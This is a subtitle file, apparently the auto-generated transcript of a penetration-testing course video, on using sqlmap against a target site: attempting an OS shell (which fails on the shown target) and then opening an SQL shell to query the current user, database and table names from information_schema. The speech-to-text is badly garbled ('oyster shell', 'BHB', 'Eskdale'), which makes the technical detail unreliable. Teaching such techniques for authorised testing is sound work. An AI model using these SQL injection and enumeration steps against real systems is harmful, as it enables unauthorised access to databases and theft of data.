1
00:00:02,610 --> 00:00:08,990
Esco up also allows you to get different types of shows on the target server so you can actually try

2
00:00:08,990 --> 00:00:12,670
to get an O Us Show used in the actual argument.

3
00:00:13,040 --> 00:00:23,490
So all you have to do is just run a skill up and put your ad and then ask for an oyster shell know in

4
00:00:23,490 --> 00:00:26,660
my case we've seen that we can't actually upload files to the server.

5
00:00:26,700 --> 00:00:28,770
So not asking me what do I want.

6
00:00:28,770 --> 00:00:31,140
What was the language that's used on the server.

7
00:00:31,150 --> 00:00:38,900
It's using BHB and you can see that the file is cannot be uploaded it's given a for or for error.

8
00:00:39,070 --> 00:00:44,560
Because my website my target doesn't allow my ascii on user to upload stuff.

9
00:00:44,630 --> 00:00:49,610
If this works you'll actually get an oyster shell and you'll be able to run OS commands on the target

10
00:00:49,640 --> 00:00:52,200
computer and other.

11
00:00:52,200 --> 00:01:00,490
The cool thing is you can ask for an ASCII L-CIO.

12
00:01:00,730 --> 00:01:06,040
And what this will give you it will allow you to run any S-curve statement straight away as if you're

13
00:01:06,040 --> 00:01:07,740
on in it through my Escorial.

14
00:01:07,750 --> 00:01:12,340
So we were able to do that before and you're using the new union select well.

15
00:01:12,370 --> 00:01:18,460
And this you'll you'll actually be right and proper as all queries and they will look it's much easier

16
00:01:18,460 --> 00:01:23,770
to write much easier to read so you'll actually be able to run more powerful attacks.

17
00:01:23,770 --> 00:01:27,730
For example we can just select the user by saying current user

18
00:01:31,480 --> 00:01:42,630
or we can just say user We can also get our current database by asking for that database.

19
00:01:42,670 --> 00:01:46,810
You can look up Eskdale syntax and then run and yes kill command you want.

20
00:01:46,810 --> 00:01:51,160
For example if we wanted to select all of the tables like we were doing before we can just do a select

21
00:01:52,770 --> 00:01:53,460
table name

22
00:01:56,580 --> 00:02:00,440
from information schema that tables

23
00:02:07,140 --> 00:02:09,480
where table schema

24
00:02:13,780 --> 00:02:15,790
equal to us then

25
00:02:24,400 --> 00:02:27,420
and I probably made a mistake here I forgot to then.

26
00:02:27,450 --> 00:02:29,140
So I'm just going to be in here.

27
00:02:29,190 --> 00:02:29,760
Enter

28
00:02:35,110 --> 00:02:37,790
they actually underscore here.

29
00:02:38,960 --> 00:02:39,920
Sorry about that.

30
00:02:40,830 --> 00:02:45,500
And as you can see now we're getting all of the tables related to the database called.

31
00:02:45,520 --> 00:02:51,010
I was then again and here we can run any scale statement that you want is just a nicer and easier way

32
00:02:51,250 --> 00:02:52,950
to execute your queries.